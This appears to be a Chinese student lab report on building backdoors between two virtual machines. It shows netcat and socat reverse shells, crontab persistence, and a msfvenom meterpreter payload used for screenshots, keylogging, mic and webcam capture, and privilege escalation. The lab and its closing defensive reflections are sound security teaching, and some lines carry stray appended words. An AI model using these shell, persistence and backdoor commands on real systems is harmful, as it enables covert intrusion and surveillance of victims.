使用 ipconfig 查看win7虚拟机IP地址为:192.168.236.130linux
使用 ipconfig 查看linux虚拟机IP地址为:192.168.236.131web
进入文件夹shell
cd netcat
开始监听windows
ncat.exe -l -p 4309
这里的 -l 是监听模式,-p是选择监听的端口。安全
nc 192.168.236.130 4309 -e /bin/sh
nc -l -p 4309
ncat.exe -e cmd.exe 192.168.236.131 4309
能够发现,linux端得到了win的shelltcp
ncat.exe -l -p 4309
nc 192.168.236.130 4309
ncat.exe -l -p 4309
crontab-e
crontab
指令能够用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab
文件中,以供以后读取和执行,"-e"表示编辑工具
在最后添加一条定时链接win端口的指令学习
56 * * * * /bin/netcat 192.168.236.130 4309 -e /bin/sh
表示每小时的第56分钟链接IP为192.168.236.130的主机(即虚拟机win7端)的4309端口,具体时间能够自行设定,我这里为了方便选择了两分钟以后的时间网站
稍等片刻,发现成功获取win端的shellui
tcp-listen:4309 exec:cmd.exe,pty,stderr
这个命令能够将cmd.exe绑定到4309端口,而且将cmd.exe的stderr重定向到stdout上
咱们能够看到,建立任务成功
使用Windows+l锁定主机后,再解锁,发现程序已经运行
socat - tcp:192.168.236.130:4309
这里的第一个参数-表明标准的输入输出,第二个流链接到Windows主机的4309端口。
在实现的时候我出现了一个问题:在tcp后多打了一个空格,卡了好久,不过好在成功了,你们引觉得戒。
修改后发现已经成功获取cmd Shell:
在linux端使用msfvenom工具,生成后门:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.194 LPORT=4309 -f exe > 20164309_backdoor.exe 192.168.236.131
其中-p 使用的payload,为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.LHOST是反弹回连的IP,即攻击机linux的IP地址,LPORT是回连的端口,-f是生成文件的类型, >输出到哪一个文件
因为一开始没有充分理解这里的ip地址的意义,我使用了被攻击win端的地址,致使在以后使用后门的时候屡屡失败。通过理解我发现这里的ip是被攻击主机须要链接的地址,即为攻击机linux端的地址。
须要在win端关闭杀软和防火墙的条件下进行
ncat.exe -lv 4309 > 20164309_backdoor.exe
其中-lv表示能够观察到链接状态
nc 192.168.236.130 4309 < 20164309_backdoor.exe发送文件
在win端命令行显示传输成功
的确传输成功了
输入
msfconsole
进入控制台(以后因为实验多次失败我进入了这个界面不知道多少次。。。幸好这里有一个小彩蛋,每次进入的界面大都和以前不同,也算是苦中做乐了吧)
use exploit/multi/handler
设置payload
set payload windows/meterpreter/reverse_tcp
使用生成后门程序时相同的payload
set LHOST 192.168.236.131
这里须要与生成后门程序的主机IP相同
set LPORT 4309
须要使用相同的端口
show options
显示选项
exploit
进行监听
多次尝试,在纠正了刚刚说的那个错误后在win端运行了正确的后门
发现能够调用win端shell
还有不少功能可使用,咱们一个一个试试吧
screenshot
进行截屏,截屏得文件nQebvnBz.jpegkeyscan_start
指令开始记录下击键的过程,乱输一通试试:成功记录
record_mic
指令截获一段音频,文件名为qbucCKSm.wav发现没法进行拍照,看看排除一下缘由,发现:
貌似虚拟机没法调用内置摄像头
上网查查有什么解决的方法
???如今去买一个外置摄像头也来不及了,忍痛割爱在本身主机上试试吧。。。
循序渐进地进行试验:
查得ip地址为:192.168.6.194
传输后门
在linux准备就绪后运行后门
发现能够拍照了,那多拍几张选一张看得出生理特征的(好比眼镜(???)),就决定是你了:hAcbeMwj,jpeg
输入getuid查看权限分组
输入getsystem进行提权
发如今提权时遇到了一些问题,没法提权
有多是win10帐号是管理员权限?那我再在win7虚拟机上尝试一下普通用户
仍是失败
再试试win7的管理员帐号
意想不到的是居然成功了,但愿大神们能帮忙解释一下原理
记得好久之前的三一五晚会曝光了一些手机APP擅自添加后门,致使巨大的财产损失的案例,那时候智能手机方兴未艾,人们的安全意识也相对薄弱,可是如今这样的事情还真实地发生在咱们身边;还有一些钓鱼网站会诱导咱们点击下载一些后门程序,一旦程序运行就成了人为刀俎我为鱼肉的情形了。
后门可能会假装成正常的程序或软件,诱导用户使用,来获取你的权限。
远程拍照功能。在以前bm管理概论的课程中我阅读了《无处可藏》这本书,有一段令我印象深入的细节是斯诺登笔记本电脑的摄像头用胶带封住了,当时我还认为杞人忧天了,可是没有想到这种技术门槛这么低。
对于咱们来讲最好的办法就是常常性的杀毒、及时更新系统、病毒库以查找后门。在实验中我还发如今进行远程照相的时候我摄像头旁边的呼吸灯闪了一下,若是现实生活中遇到这种状况务必要注意了
此次实验最大的收获就是明白了细节决定成败。因为本身的粗心马虎,此次实验几乎花了我两个晚上才完成,每一步都要遇到一些或多或少地小问题。甚至一开始为了避免注册码云帐号没有使用老师的ncet而去网上下载了一个,致使在传输文件的时候出现问题;还有输入socat命令的时候多打了一个空格,也致使没法顺利调用shell;甚至在写实验报告的时候发现缺乏关键的截图而回过头来临时作临时截的。在从此的实验和学习乃至工做中,我必定要戒骄戒躁,时刻关注细节,才能高质量地完成任务。